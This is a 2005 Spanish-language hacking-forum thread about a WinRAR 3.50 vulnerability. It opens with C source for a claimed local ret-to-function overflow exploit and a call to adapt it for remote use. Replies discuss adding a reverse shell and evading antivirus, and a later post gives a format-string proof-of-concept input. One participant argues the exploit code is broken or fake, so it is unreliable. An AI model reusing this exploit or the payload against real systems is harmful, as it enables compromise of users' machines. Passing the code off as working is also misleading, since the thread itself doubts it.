elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 11:58  


Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Exploit WinRAR 3.50		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Exploit WinRAR 3.50  (Leído 1,905 veces)
ANELKAOS
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.049


#include<nda.h>


Ver Perfil WWW
Exploit WinRAR 3.50
« en: 8 Noviembre 2005, 15:59 »
Código:
/*

local exploit for winrar <= 3.50 ENG version


bug is 0day :)

i'm used ret-2-func technique.

*/

#include <stdio.h>
#include <string.h>
#include <windows.h>

int main ( int argc, char *argv[] )
{
   long sys_addr  = 0x77C18044; // winxp sp0 targets...
   long exit_addr = 0x77C27ADC;
   long cmd_addr  = 0x77C01335;

   char buf[3000];
   char cmd[3000];

   if ( argc < 2 )
   {
   printf("\n * 0xLeTzDanCe - WinRAR <= 3.50 local exploit ENG version  *\n * * usage: 0xletzdance.exe <path_to_RAR>\n\n");
   exit(0);
   }

   memset(buf, 0x00, 3000);
   memset(cmd, 0x00, 3000);

   memset(buf, 0x55, 516);

   *(long*)&buf[strlen(buf)]  = sys_addr;
   *(long *)&buf[strlen(buf)] = exit_addr;
   *(long *)&buf[strlen(buf)] = cmd_addr;

   sprintf(cmd, "%s %s", argv[1], buf);
   system(cmd);

}

http://www.securityfocus.com/bid/15123

Se puede explotar en remoto. Cada cual que le eche imaginación  ::)
En línea
whaky

Desconectado Desconectado

Mensajes: 151


Angel del Infierno


Ver Perfil
Re: Exploit WinRAR 3.50
« Respuesta #1 en: 8 Noviembre 2005, 18:09 »
el link  q dejaste de securityfocus pone win rar 3.50 como no vulnerable... con este exploit es vulnerable?
En línea
Los muertos hablan y las paredes oyen
por si acaso nunca reveles tu identidad.
BenRu
The Prodigy


Desconectado Desconectado

Mensajes: 4.004


Ver Perfil
Re: Exploit WinRAR 3.50
« Respuesta #2 en: 8 Noviembre 2005, 18:54 »
Gracias por el code ANELKAOS...
El exploit esta en C...ahora abra que probar a ver como funciona  :)
En línea
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Exploit WinRAR 3.50
« Respuesta #3 en: 8 Noviembre 2005, 19:26 »
Cita de: whaky en  8 Noviembre 2005, 18:09
el link  q dejaste de securityfocus pone win rar 3.50 como no vulnerable... con este exploit es vulnerable?


para versiones inferiores a la 3.50

Salu2
En línea


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
dxr
Colaborador
***
Desconectado Desconectado

Mensajes: 2.991



Ver Perfil
Re: Exploit WinRAR 3.50
« Respuesta #4 en: 8 Noviembre 2005, 21:02 »
Si es bug facil de reprogramarlo para q sea "remoto". me estais picando ¬¬ xD me vais hacer programar un exploit con revershe shell para eso? XD no joder.... q no tiene muchas salidas eso...
En línea
Hacer preguntas concretas, claras y aportando toda la documentación necesaria.
De lo contrario, no tendreis una respuesta clara.
BenRu
The Prodigy


Desconectado Desconectado

Mensajes: 4.004


Ver Perfil
Re: Exploit WinRAR 3.50
« Respuesta #5 en: 8 Noviembre 2005, 23:23 »
Y con eso se puede sacar la shell? :o
En línea
NostraTerranius

Desconectado Desconectado

Mensajes: 48


Ver Perfil
Re: Exploit WinRAR 3.50
« Respuesta #6 en: 10 Noviembre 2005, 10:40 »
El exploit esta mal, tiene pinta de casi fake...

Citar
long sys_addr  = 0x77C18044; // winxp sp0 targets...
   long exit_addr = 0x77C27ADC;
   long cmd_addr  = 0x77C01335;

Pase que sepas los offsets de system() o exit(), pero porque hardcodea el offset de donde esta la cadena CMD???? Si no lo sabe, ni siquiera lo pone por ningun lado que la inserta.

Citar
*(long*)&buf[strlen(buf)]  = sys_addr;
   *(long *)&buf[strlen(buf)] = exit_addr;
   *(long *)&buf[strlen(buf)] = cmd_addr;

Creo que sabemos perfectamente que hace esto... pero sigue metiendo la direccion de la cadena CMD, sin haberla insertado. O es que el WinRAR deja una cadena "cmd.exe" en algun lugar misterioso de la pila sin que lo sepamos? y ademas, hardcodeado.

Tal y como esta planteado el exploit, no puede funcionar...

Otra cosa es que dentro de unas horas, yo pueda hacer que funcione  ;D
En línea
BenRu
The Prodigy


Desconectado Desconectado

Mensajes: 4.004


Ver Perfil
Re: Exploit WinRAR 3.50
« Respuesta #7 en: 10 Noviembre 2005, 18:43 »
Entonces como seria el code?

12 Mensajes y ya eres colaborador? :o
Debes de ser un genio o tener enchufe  :-\
En línea
Codename!!


Desconectado Desconectado

Mensajes: 881



Ver Perfil
Re: Exploit WinRAR 3.50
« Respuesta #8 en: 10 Noviembre 2005, 20:33 »
si lo haceis funcionar, y encima hacer que sea "remoto"  ;D , me gustaria probarlo  :P
En línea
No te dejes mover por las masas, se tu mismo.
NostraTerranius

Desconectado Desconectado

Mensajes: 48


Ver Perfil
Re: Exploit WinRAR 3.50
« Respuesta #9 en: 10 Noviembre 2005, 22:25 »
Joder, que lio me he hecho con el exploit... ;D

Para mi que es un fake del copon, señores.
En línea
dxr
Colaborador
***
Desconectado Desconectado

Mensajes: 2.991



Ver Perfil
Re: Exploit WinRAR 3.50
« Respuesta #10 en: 10 Noviembre 2005, 22:35 »
Nose peor me habeis ehco perder el tiempo leyendome el epxloit... a mi me parece una payasada... cuando decimos remote shell o reverseshell... esq cuando lo ejecta te mand auna shell.. peor vamos no tiene ni pies ni cabeza xq pa meterle un exploit le metes un troyano a kien sea. no merece la pena q sigais con ello... como nota informativa esta curioso... pero nada mas.
En línea
Hacer preguntas concretas, claras y aportando toda la documentación necesaria.
De lo contrario, no tendreis una respuesta clara.
NostraTerranius

Desconectado Desconectado

Mensajes: 48


Ver Perfil
Re: Exploit WinRAR 3.50
« Respuesta #11 en: 10 Noviembre 2005, 22:39 »
Hombre, un rar malicioso de este tipo no lo detectara *casi* ningun AV. Y puede que un troyano si...

De todas formas, el exploit es un fake, estoy seguro.
En línea
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Exploit WinRAR 3.50
« Respuesta #12 en: 14 Noviembre 2005, 20:51 »
actualizando la informacion:

WinRAR Format String and Buffer Overflow Vulnerabilities

vulnerable version 3.50 y anteriores

Descripcion de la Vunerabilidad:
-------------------------------------

a.-un error de secuencia de formato se produce cuando un mensaje de error de diagnostico avisa al usuario de nombre de archivo invalido en un UUE/XXE codificado. Esto se puede explotar para ejecutar código arbitrario cuando
se descifra el archivo malévolo de UUE/XXE.

b.-un error de limite en UNACEV2.DLL  se puede explotar para causar un buffer overflow.Esto permite la ejecución del código arbitrario cuando un archivo  ACE que contiene un archivo con un nombre excesivamente largo, se extrae.

Prueba de concepto:
------------------------

Código:
begin 644 %0.8x.%0.8x.%0.8x.%0.8x.%0.8xAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
`
end

Solucion:
-----------
actualizar a la version 3.51

Fuente:securityfocus

Salu2
En línea


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines